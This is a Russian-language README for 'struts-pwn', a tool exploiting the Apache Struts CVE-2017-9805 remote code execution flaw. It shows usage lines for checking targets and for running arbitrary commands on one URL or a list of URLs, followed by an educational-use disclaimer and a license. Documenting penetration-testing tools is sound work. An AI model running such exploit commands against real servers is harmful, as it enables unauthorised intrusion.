
Эксплойт для Apache Struts CVE-2017-9805
python struts-pwn.py --url 'http://example.com/struts2-rest-showcase/orders/3'
python struts-pwn.py --list 'urls.txt'
python struts-pwn.py --exploit --url 'http://example.com/struts2-rest-showcase/orders/3' -c 'touch /tmp/struts-pwn'
python struts-pwn.py --exploit --list 'urls.txt' -c 'touch /tmp/struts-pwn'

Этот проект создан исключительно для образовательных целей и этического тестирования. Использование struts-pwn для атаки на цели без предварительного взаимного согласия незаконно. Конечный пользователь несёт ответственность за соблюдение всех применимых местных, государственных и федеральных законов. Разработчики не несут никакой ответственности за любое неправомерное использование или ущерб, причинённый этой программой.
Проект распространяется под лицензией MIT.
Mazin Ahmed